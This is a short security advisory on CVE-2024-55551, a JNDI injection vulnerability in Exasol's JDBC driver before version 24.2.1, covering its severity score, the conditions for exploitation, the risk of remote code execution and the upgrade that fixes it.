CVE-2024-55551

CVE-2024-55551 affects the Exasol JDBC driver in versions prior to 24.2.1, released on 2024-12-10. The vulnerability enables attackers to inject malicious parameters into a JDBC URL, which triggers JNDI injection during the driver's connection process to the database. This flaw, classified as CWE-471, carries a CVSS v3.1 base score of 8.3 (AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H) and can lead to remote code execution.

Exploitation targets users or applications that process untrusted JDBC URLs with the vulnerable driver. An attacker with network access must employ high-complexity techniques and rely on user interaction, such as tricking a victim into supplying or using a malicious URL in a Java application connecting to Exasol. Successful JNDI injection allows remote code execution in the context of the application process, with elevated scope impacting confidentiality, integrity, and availability at a high level.

Exasol mitigates this issue in JDBC driver version 24.2.1, as detailed in the official release notes. Administrators should upgrade to this version or later and review connection handling practices, per the driver documentation. Additional technical details, including a proof-of-concept, appear in a GitHub gist, with related context in a Black Hat Europe 2024 briefing on Java Authentication and Authorization Service (JAAS) attack surfaces.